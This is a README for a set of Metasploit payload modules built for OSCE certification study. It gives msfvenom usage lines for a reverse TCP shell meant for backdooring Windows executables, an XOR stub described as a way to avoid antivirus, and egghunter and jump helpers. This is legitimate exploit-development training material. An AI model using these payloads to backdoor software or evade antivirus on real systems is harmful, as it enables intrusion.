# OSCE
Scripts I developed to help complete the OSCE certification.


## shell_reverse_tcp_embeddable.rb

To aid in embedding a backdoor in a PE, this metasploit payload will produce an embed-safe reverse_tcp shell via the following adjustments:
- Removing the (-1) timeout in NtWaitForSingleObject
- Removing default exit function
- Fixing the stack after execution

#### **Usage:**

```bash
msfvenom -a x86 --platform windows -p windows/osce/shell_reverse_tcp_embeddable -f hex LHOST=<LISTENING IP> LPORT=<LISTENING PORT>
```


## xor_decoder_stub.rb

To aid in avoiding antivirus, this metasploit payload will produce an XOR encoder/decoder stub to embed in the executable.

#### **Usage:**

```bash
msfvenom -a x86 --platform windows -p windows/osce/xor_decoder_stub -f hex START=0x<MEM BLOCK START> END=0x<MEM BLOCK END> KEY=0x<XOR KEY>
```

## egghunter.rb

Egghunter implementation using *NtAccessCheckAndAuditAlarm*.

#### **Usage:**

```bash
msfvenom -a x86 --platform windows -p windows/osce/egghunter -f hex EGG=W00T
```

## egghunter_restricted.rb

Egghunter implementation using *NtAccessCheckAndAuditAlarm* with an extremely limited character set.

#### **Usage:**

NOTE: First, configure decode location manually with three `SUB EAX, 0xXXXXXXXX` operations.
```bash
msfvenom -a x86 --platform windows -p windows/osce/egghunter_restricted -f hex EGG=W00T
```

## long_jump.rb

Make large jumps in increments of 256 bytes *(Phrack #62 Article 7 by Aaron Adams)*.

#### **Usage:**

```bash
msfvenom -a x86 --platform windows -p windows/osce/long_jump -f hex COUNT=4 BACKWARD=true
```
